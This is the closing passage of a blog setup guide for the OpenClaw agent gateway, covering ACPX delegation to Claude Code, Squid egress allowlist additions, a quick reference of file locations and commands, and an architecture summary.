<p>Add to <code class="language-plaintext highlighter-rouge">~/.acpx/config.json</code> to point the <code class="language-plaintext highlighter-rouge">openclaw</code> agent at your local gateway instance:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"defaultAgent"</span><span class="p">:</span><span class="w"> </span><span class="s2">"claude"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"defaultPermissions"</span><span class="p">:</span><span class="w"> </span><span class="s2">"approve-all"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"agents"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"openclaw"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"command"</span><span class="p">:</span><span class="w"> </span><span class="s2">"env OPENCLAW_HIDE_BANNER=1 node scripts/run-node.mjs acp --url ws://127.0.0.1:18789 --token-file ~/.openclaw/gateway.token --session agent:main:main"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<h3 id="test-the-delegation">Test the delegation</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Ask Claude Code a coding task via ACPX</span>
acpx claude <span class="s2">"explain the structure of this repo"</span>

<span class="c"># Named parallel sessions — useful for running multiple tasks concurrently</span>
acpx claude <span class="nt">-s</span> backend <span class="s2">"implement token pagination"</span>
acpx claude <span class="nt">-s</span> frontend <span class="s2">"update the API docs"</span>

<span class="c"># Queue a prompt without waiting for the result</span>
acpx claude <span class="s2">"run the test suite and fix any failures"</span> <span class="nt">--no-wait</span>

<span class="c"># Check session status</span>
acpx status

<span class="c"># View recent session history</span>
acpx sessions <span class="nb">history</span> <span class="nt">--limit</span> 10
</code></pre></div></div>

<h3 id="how-it-fits-into-the-security-model">How it fits into the security model</h3>

<p>Claude Code runs as the <code class="language-plaintext highlighter-rouge">openclaw</code> user and inherits the Squid proxy egress restrictions from Section 11. Its outbound traffic — npm installs, GitHub API calls, documentation fetches — routes through the allowlist. If Claude Code needs to reach a domain that isn’t listed, add it to <code class="language-plaintext highlighter-rouge">/etc/squid/allowed_domains.txt</code> and reload Squid.</p>

<p>Claude Code does not have access to the browser container or its CDP port directly — that’s still mediated by the OpenClaw gateway.</p>

<h3 id="egress-additions-for-claude-code">Egress additions for Claude Code</h3>

<p>Add these to your Squid allowlist if Claude Code needs them:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">".npmjs.com"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /etc/squid/allowed_domains.txt
<span class="nb">echo</span> <span class="s2">".registry.npmjs.org"</span> | <span class="nb">sudo tee</span> <span class="nt">-a</span> /etc/squid/allowed_domains.txt
<span class="nb">sudo </span>systemctl reload squid
</code></pre></div></div>

<hr />

<h2 id="18-quick-reference">18. Quick Reference</h2>

<h3 id="key-file-locations">Key file locations</h3>

<table>
  <thead>
    <tr>
      <th>File</th>
      <th>Purpose</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.openclaw/openclaw.json</code></td>
      <td>Main configuration</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.openclaw/.env</code></td>
      <td>Secret references (1Password <code class="language-plaintext highlighter-rouge">op://</code> URIs)</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.openclaw/agents/&lt;id&gt;/sessions/</code></td>
      <td>Session transcripts (JSONL)</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.openclaw/agents/&lt;id&gt;/agent/MEMORY.md</code></td>
      <td>Persistent agent memory</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.openclaw/agents/&lt;id&gt;/agent/auth-profiles.json</code></td>
      <td>Auth profiles and tokens</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.config/gogcli/</code></td>
      <td>Google OAuth tokens for gogcli</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">~/.openclaw/.op_token</code></td>
      <td>1Password service account token (600 permissions)</td>
    </tr>
  </tbody>
</table>

<h3 id="essential-commands">Essential commands</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openclaw status                    <span class="c"># Gateway and channel status</span>
openclaw doctor                    <span class="c"># Security and config audit</span>
openclaw sessions list             <span class="c"># List active sessions</span>
openclaw models list               <span class="c"># Available models</span>
openclaw gateway restart           <span class="c"># Restart the gateway</span>
openclaw plugins list              <span class="c"># Installed plugins</span>
</code></pre></div></div>

<h3 id="chat-commands-telegram--webchat">Chat commands (Telegram / WebChat)</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/status                            # Session status, model, token count
/model &lt;provider/model&gt;            # Switch model
/model opus                        # Switch using alias
/new                               # Start a fresh session
/reset                             # Reset current session
</code></pre></div></div>

<hr />

<h2 id="architecture-summary">Architecture Summary</h2>

<p>The full picture once everything is wired up:</p>

<p><img src="/pr-preview/pr-12/assets/images/generated/openclaw-setup-guide-architecture.jpeg" alt="Overall system architecture — user devices connect via Tailscale to the VPS, where the Gateway and sandboxed Browser container run with separate network paths" /></p>

<p>The gateway is the trust boundary. It holds the secrets, and its network access is locked down. The browser is the open channel to the web, and it has nothing worth stealing.</p>

  </div>

  <footer class="post-footer">
    <a class="back-link" href="/pr-preview/pr-12/">← All posts</a>
  </footer>
</article>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="footer-inner">
      <span>Justin Flick</span>
      <a href="/pr-preview/pr-12/feed.xml">RSS</a>
    </div>
  </div>
</footer>
</body>

</html>
